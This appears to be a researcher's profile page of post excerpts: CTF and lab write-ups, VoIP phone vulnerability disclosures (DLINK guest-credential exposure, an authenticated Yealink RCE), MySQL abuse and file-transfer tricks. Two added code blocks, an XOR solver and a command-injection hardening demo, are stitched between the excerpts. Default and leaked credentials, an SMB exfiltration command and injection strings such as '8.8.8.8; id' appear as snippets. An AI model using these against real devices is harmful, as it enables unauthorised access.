Tahaa Farooq

@tahaafarooq

SM @ OffSec | お前はもう死んでいる

Joined on Jul 24, 2021

  • -- RICKROLL -- Description During a local CTF, there was a challenge that had a VoIP. I interacted with a DLINK DPH-400SE running firmware version FRU 2.2.15.8. It's basically a VoIP phone, and the vendor is DLINK. In this writeup, I explain how I was able to uncover yet another vulnerability, generally a weakness of ID 200: CWE-200. This weakness allowed me to log in to the web portal of the device using default guest credentials and read all the SIP authenticated user passwords as well as the administrator's password. POC Log in to the portal using the credentials "guest:guest". Heading to the maintenance tab, we have the access feature, which has an option to modify accounts accessing the device:
  • Whether you are solving a machine/lab or engaging in a penetration testing assessment, there will be times when you are required to transfer a file, either from your host to the target's host (Windows/Linux) or vice versa. Here I share a few tricks on how you can transfer files from a Windows machine to your Kali host. Using SMB With impacket we can use the utility impacket-smbserver to start an SMB server and use it to transfer files from Windows. On Kali Host impacket-smbserver test . -smb2support -username jojomojo -password jojomojo On Windows net use m: \\YOUR_KALI_IP\test /user:jojomojo jojomojo copy backup.zip m:\
  • This starter course gets you up and running with CryptoHack. You'll learn to encode and decode data types that are commonly used in cryptography. Then you'll get comfortable with the XOR operation, which is at the centre of symmetric cryptography. Finally, the course ends with some fun XOR puzzles to test what you've learned. In this writeup I shall cover my solutions to the problems that are available in this introductory course module. 1. Finding Flags Description Each challenge is designed to help introduce you to a new piece of cryptography. Solving a challenge will require you to find a "flag".
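The XOR puzzles that close the CryptoHack intro module build on one property: a repeating-key XOR stream leaks the key wherever the plaintext is known. The following is an added example written for this page (it is not the author's solution code nor CryptoHack's material): it implements repeating-key XOR, recovers the key from a known plaintext prefix, and, when the known prefix is shorter than the key, fixes the remaining key bytes from the closing brace of the flag format plus a small brute force. The key, the flag text and the ciphertext are constructed here for the demo, not taken from any challenge.

```python
import itertools
from typing import List, Optional, Tuple

# Bytes accepted as plausible plaintext (printable ASCII only).
PRINTABLE = set(range(32, 127))


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("xor_bytes needs equal-length inputs")
    return bytes(x ^ y for x, y in zip(a, b))


def repeating_xor(data: bytes, key: bytes) -> bytes:
    """Encrypt or decrypt with a repeating key; XOR is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key_from_prefix(ct: bytes, known_prefix: bytes, key_len: int) -> bytes:
    """Known-plaintext recovery: ct[i] ^ pt[i] == key[i % key_len], so a known
    prefix at least key_len bytes long gives the whole key directly."""
    if len(known_prefix) < key_len:
        raise ValueError("known prefix shorter than key length")
    return xor_bytes(ct[:key_len], known_prefix[:key_len])


def crack_with_flag_format(
    ct: bytes,
    prefix: bytes = b"crypto{",
    suffix: bytes = b"}",
    max_key_len: int = 16,
    max_unknown: int = 2,
) -> List[Tuple[bytes, bytes]]:
    """Try every key length up to max_key_len. Key bytes covered by the known
    prefix and by the trailing suffix are fixed; at most max_unknown remaining
    positions are brute-forced. Returns every (key, plaintext) pair whose
    plaintext matches the flag format and is fully printable."""
    results: List[Tuple[bytes, bytes]] = []
    for key_len in range(1, max_key_len + 1):
        key: List[Optional[int]] = [None] * key_len
        for i, p in enumerate(prefix[:key_len]):
            key[i] = ct[i] ^ p
        consistent = True
        for j, s in enumerate(suffix):
            pos = len(ct) - len(suffix) + j
            k = pos % key_len
            if key[k] is None:
                key[k] = ct[pos] ^ s
            elif key[k] != ct[pos] ^ s:
                consistent = False  # prefix and suffix disagree: wrong key length
                break
        if not consistent:
            continue
        unknown = [i for i, v in enumerate(key) if v is None]
        if len(unknown) > max_unknown:
            continue
        for guess in itertools.product(range(256), repeat=len(unknown)):
            cand = list(key)
            for i, g in zip(unknown, guess):
                cand[i] = g
            cand_key = bytes(cand)  # type: ignore[arg-type]
            pt = repeating_xor(ct, cand_key)
            if pt.startswith(prefix) and pt.endswith(suffix) and all(b in PRINTABLE for b in pt):
                results.append((cand_key, pt))
    return results


# Constructed sample: an 8-byte key and a flag in the CryptoHack format.
KEY = b"myXORkey"
FLAG = b"crypto{x0r_is_its_0wn_inverse}"
CT = repeating_xor(FLAG, KEY)

if __name__ == "__main__":
    print("ciphertext:", CT.hex())
    print("key from 8 known bytes:", recover_key_from_prefix(CT, FLAG[:8], 8))
    for key, pt in crack_with_flag_format(CT):
        print(f"key_len={len(key)} key={key!r} -> {pt!r}")
```

The brute-force stage is capped at two unknown key bytes (65536 trials), which is enough when the flag prefix is only a byte or two shorter than the key; for longer keys you would add more known plaintext rather than raise the cap.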
  • MySQL is an open-source relational database management system (RDBMS) that uses structured query language (SQL) for accessing and managing data. It is one of the most widely used RDBMS in the world. In this article, I will be writing about how you, as a penetration tester, can leverage access to a MySQL service to gain complete access to the server, read files from the server, and write files to the server. This is achieved by identifying common misconfigurations and settings and exploiting them to achieve the intended goal. Connecting to MySQL This is considered a scenario where you have initially already gained credentials that log in to MySQL; as an example, they might be in a .env file: DB_HOST=localhost
  • What is Solar-PuTTY? Solar-PuTTY is a standalone free terminal emulator and network file transfer tool based on the well-known PuTTY for Windows. You can download it here: Solar-Putty I have the version: I have been using Solar-PuTTY for a while now; below is a preview of how Solar-PuTTY actually looks. Basically, it can hold sessions of the servers that you have access to, and you don't need to re-enter the passwords!
  • This writeup contains the challenges that I authored, which were hosted at the finals and categorized under Reverse Engineering! REVERSE ENGINEERING Easy : REbasic First, looking at readable strings using rabin2 with the command: rabin2 -z rebasic We have some useful strings here, and we can also see a string that is even more interesting, saying: /tmp/flag.txt.
  • This is a writeup of the collection of challenges I have solved from cybertalents, ranging from easy to advanced. NOTE : THIS WRITEUP CONTAINS SPOILERS LEVEL : BASIC Pure Luck Description (1/24) * (1/60) * (1/60) , flag format:flag{xxxxxxxxxxxxxxxxxxxxxxxxx} Link pure-luck.out Solution
  • Hello everybody reading this :), This is a writeup on how we solved some of the challenges hosted in the Hackthebox Cyber Apocalypse CTF 2024 with the theme "Hacker Royale". The categories range from Web, Misc, Reverse Engineering, PWN, Forensics and Cryptography. NOTE : The challenges were solved by me, @alienX and the others who were in the team :) Web Challenges Flag Command (Very Easy - 300 points) Description Provided with the challenge description above, I spawn the docker instance and start solving this challenge!
  • Below is a writeup of my solution upon solving the reverse engineering category from picoCTF 2024. There was a total of 7 reverse engineering challenges. I could say they were pretty straightforward and interesting challenges. Let's dive into it! There is a note from picoCTF, but anyway, I hope they put it in the GYM soon 😭 Packer (100 Points) Description Solution Provided with an executable, the first thing I check is whether the binary is packed, as the challenge name hints:
  • A lil' Bit About It This is something that I challenged myself to do. I had a TECNO Camon X CA7 model, which is a smartphone, and basically in all TECNO smartphone models there is a feature that allows the user to hide images. I hid some of the images and then set a pin that I would use to unlock the vault for hiding my images. A question flew into my mind: "What if I don't know the pin??" Then I dared myself to take this challenge to research this petty feature! Let The Fun Begin As seen, it asks for a pin so that we can preview what's in the hidden album. We can either bruteforce manually to get the pin, since it's a 4-digit pin, which will obviously be time consuming but worth it eventually, or we can decide to find out where the image is saved after being sent to the hidden album. Connecting the smartphone to my laptop and enabling the transfer of files will allow me to view all folders in the system.
  • Scanning & Enumeration Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 02:47 EDT Nmap scan report for 10.10.10.175 Host is up (0.15s latency). Not shown: 990 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods:
  • Do you love hacking phones? Well, of course VoIP phones; this should be worth a read! Just uncovered a vulnerability that existed in Yealink SIP-TXXX. This vulnerability leads to RCE, but it's authenticated, meaning you must be logged in to the web interface! Proof Of Concept After logging in to the web interface, which can be on port 80 or port 443, there is a Network tab; clicking on it, there are 5 sections: Basic, PC Port, NAT, Advanced, and Diagnostics. Clicking on Diagnostics, there we can ping or perform a traceroute command upon an IP address; capturing that request with Burp Suite will reveal how the whole thing should look and how the parameters are sent with their values; POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
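The ping/traceroute diagnostics page described above is the textbook home of authenticated command injection: the submitted target reaches a shell. The following is an added example written for this page, not the post's exploit and not Yealink's firmware code (the phone's handler is not public): it shows the vulnerable pattern, a target spliced into a shell string, beside a hardened handler that whitelists the tool, validates the target with the standard ipaddress module and a hostname regex, and passes an argv list to subprocess with no shell. The tool names, helper names and sample targets are assumptions for the demo.

```python
import ipaddress
import re
import subprocess
from typing import List

# RFC 1123 hostname labels: alphanumerics and hyphens, no leading hyphen, so a
# validated value can never start with "-" and be parsed as an option by ping.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE,
)

# Assumed whitelist of diagnostic tools and their fixed argv prefixes.
ALLOWED_TOOLS = {"ping": ["ping", "-c", "4"], "traceroute": ["traceroute"]}


def build_unsafe_command(tool: str, target: str) -> str:
    """The vulnerable pattern: the submitted target is spliced into a shell
    string that is then handed to a shell. A target such as '8.8.8.8; id'
    makes the shell run a second command with the web server's privileges."""
    return f"{tool} -c 4 {target}"


def is_valid_target(target: str) -> bool:
    """Accept only an IPv4/IPv6 literal or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return _HOSTNAME_RE.match(target) is not None


def build_safe_command(tool: str, target: str) -> List[str]:
    """Hardened form: whitelist the tool, validate the target, and return an
    argv list so that no shell ever parses user input."""
    if tool not in ALLOWED_TOOLS:
        raise ValueError(f"unsupported diagnostic tool: {tool!r}")
    if not is_valid_target(target):
        raise ValueError(f"invalid target: {target!r}")
    return ALLOWED_TOOLS[tool] + [target]


def run_diagnostic(tool: str, target: str, timeout: int = 30) -> str:
    """Execute the validated command without a shell and return its stdout."""
    proc = subprocess.run(
        build_safe_command(tool, target),
        shell=False,
        capture_output=True,
        text=True,
        timeout=timeout,
    )
    return proc.stdout


def suspicious_targets(submitted: List[str]) -> List[str]:
    """Triage helper for request logs: return the submitted target values that
    would have failed validation, i.e. candidate injection attempts."""
    return [t for t in submitted if not is_valid_target(t)]


if __name__ == "__main__":
    # Constructed sample values, not a real capture.
    samples = ["8.8.8.8", "2001:db8::1", "8.8.8.8; id", "$(id)", "-h"]
    print("unsafe string:", build_unsafe_command("ping", "8.8.8.8; id"))
    print("safe argv:", build_safe_command("ping", "8.8.8.8"))
    print("flagged:", suspicious_targets(samples))
```

The validation rejects anything that is not an address or hostname rather than trying to strip shell metacharacters, which is the usual way such filters get bypassed; the argv list removes the shell from the path entirely, so even a hostname containing unexpected characters could not become a second command.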
  • CyberTalents Kids is a gamified cyber security platform allowing students, especially those under the age of 18, to learn, practice, compete and engage in cybersecurity activities based on realistic, CTF-like examples. This goes over how I solved the challenges hosted in each category on this platform. The categories available are: Web Security, Malware Reverse Engineering, Cryptography, Digital Forensics, Network Security, Open Source Intelligence, Bash, and General Information, but I won't do General Information. Malware Reverse Engineering Getting Started Description: The correct input is the flag, format flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} Given a binary file that we have to reverse and get the flag from.
  • This was a CTF hosted by Cybertalents for the scholarship students who are taking the web security course, and I happen to be among the students taking the course. The CTF was jeopardy-styled, and participants were to participate only as individuals and not as a team. The challenge that took most of my time and that I love a lot from this CTF is Notes; most of the other challenges were easy except for Notes and Grocery Bot. The scoreboard at the time I was doing this writeup: First Challenge: one click (general information) Description: Type of malicious exploit of a website where unauthorized commands are submitted from a user that the web application trusts. This was an easy one; right off the bat the answer was CSRF.
  • This was a category which required users to use their OSINT skills to get the flags, and I'll be writing a writeup of how each challenge was solved! Winged Companion This challenge was made by thecybersamurai; the description was: My name is derived from a mythical winged Greek creature. I have the ability to infiltrate your device and have access to your SMS, Emails, Whatsapp, Photos And Videos, GPS Data, Activate Microphone, Record calls, Calendar and Contact Books. Who Am I?? First we break down the keywords: mythical - winged - Greek creature. That brings us to Pegasus if you google that, and Pegasus is a spyware hehehe. So the flag was: h4k-it{pegasus}
  • I am among the organizers of this CTF and a CTF author. In this writeup I'll be showing and explaining the solving of the two machines I made, namely White and Get Leet 2, where White was a Linux Ubuntu-based box and Get-Leet-2 was a Windows-based box. Starting with White, which was the Linux one! WHITE I'm just gonna go ahead fast with this LOL. We have ports 80 and 22 open; checking on port 80 we have the Apache page. So, running gobuster with the wordlist SecLists/Fuzzing/fuzz-Bo0om.txt, you get /secret/, which has index.php, which is a rabbit hole; so, dirsearching inside the dir, we find index.txt, which carries credentials for a user named marce with password marce@2021. I now use the creds found to log in to the machine with SSH, and we are in. Checking for user privileges: marce@white:~$ sudo -l Matching Defaults entries for marce on white.fqwkjfhbenledfj4uincv222dc.bx.internal.cloudapp.net: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
  • This room is made with challenges aimed at learning more about static analysis. The challenges are Windows executables, yeah scary, but luckily you don't need a Windows machine to solve this room; it has 3 challenges, namely strings1, strings2, and strings3! I'll be using Ghidra and Cutter for all of these challenges! String 1 Description: This executable prints an MD5 hash on the screen when executed. Can you grab the exact flag? Note: You don't need to run the executable!
  • Enumeration First I run Nmap and get two ports open, that is port 80 and port 8080, and I answer the question asking about ports. # Nmap 7.92 scan initiated Sat Feb 12 22:32:01 2022 as: nmap -A -oN nmap-scan 10.10.112.90 Nmap scan report for 10.10.112.90 Host is up (0.36s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu)
  • Enumeration Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 14:17 E. Africa Standard Time Nmap scan report for 10.10.170.149 Host is up (0.35s latency). Not shown: 98 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
  • Practice your skills in reversing and get the flag by bypassing the login. Given a file that we need to reverse engineer to get the username so that we can then get the flag. This is literally easy and good for beginners like me :) Getting The Flag First, before running it, I check the file type: ➜ classic_passwd file Challenge.Challenge Challenge.Challenge: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b80ce38cb25d043128bc2c4e1e122c3d4fbba7f7, for GNU/Linux 3.2.0, not stripped